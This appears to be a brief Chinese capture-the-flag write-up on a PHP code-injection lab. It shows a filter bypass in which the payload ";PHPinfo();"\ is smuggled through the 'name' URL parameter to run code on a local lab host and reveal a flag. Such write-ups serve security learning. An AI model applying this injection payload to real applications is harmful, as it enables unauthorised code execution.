Vuln-Range之php命令注入

1.开启靶场

简介显示PHPcode注入漏洞,简单绕过之后就可以执行PHPinfo(),拿到flag啦。

通过传入name参数的值就可以来进行代码注入了。

2.随便试一个

http://192.168.0.20:32769/?name=PHPinfo()

果然没有那么简单,被过滤了。

3.查看源码

 

我不太懂PHP代码,查阅了一下,可以通过截断的方式来进行绕过

";PHPinfo();"\ #通过;来把拼接的字符串截断就可以绕过了
http://192.168.0.20:32769/?name=%22;PHPinfo();%22\

拿到flag

flag{39a23b19e7df2581be80091b484687bc} 

 

相关文章

统一支付是JSAPI/NATIVE/APP各种支付场景下生成支付订单,返...
统一支付是JSAPI/NATIVE/APP各种支付场景下生成支付订单,返...
前言 之前做了微信登录,所以总结一下微信授权登录并获取用户...
FastAdmin是我第一个接触的后台管理系统框架。FastAdmin是一...
之前公司需要一个内部的通讯软件,就叫我做一个。通讯软件嘛...
统一支付是JSAPI/NATIVE/APP各种支付场景下生成支付订单,返...